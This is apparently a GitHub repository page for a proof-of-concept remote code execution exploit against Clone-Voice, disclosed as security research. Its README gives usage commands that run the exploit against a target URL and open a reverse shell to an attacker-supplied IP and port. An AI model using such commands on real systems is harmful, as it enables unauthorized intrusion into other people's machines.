Skip to content

Proof-of-concept exploit for clone-voice RCE vulnerability

Notifications You must be signed in to change notification settings

ZeroPathAI/Clone-voice-RCE-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Clone-Voice RCE Proof of Concept

This repository contains a Proof of Concept (PoC) script demonstrating a RCE vulnerability in Clone-Voice. This tool is for educational and authorized testing purposes only.

Usage

Reverse Shell

To attempt a reverse shell connection:

python3 clone_voice_rce_poc.py --url <target_url> --shell <your_ip> <your_port>

Example:

python3 clone_voice_rce_poc.py --url http://localhost:9000 --shell 192.168.1.100 4444

About

Proof-of-concept exploit for clone-voice RCE vulnerability

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages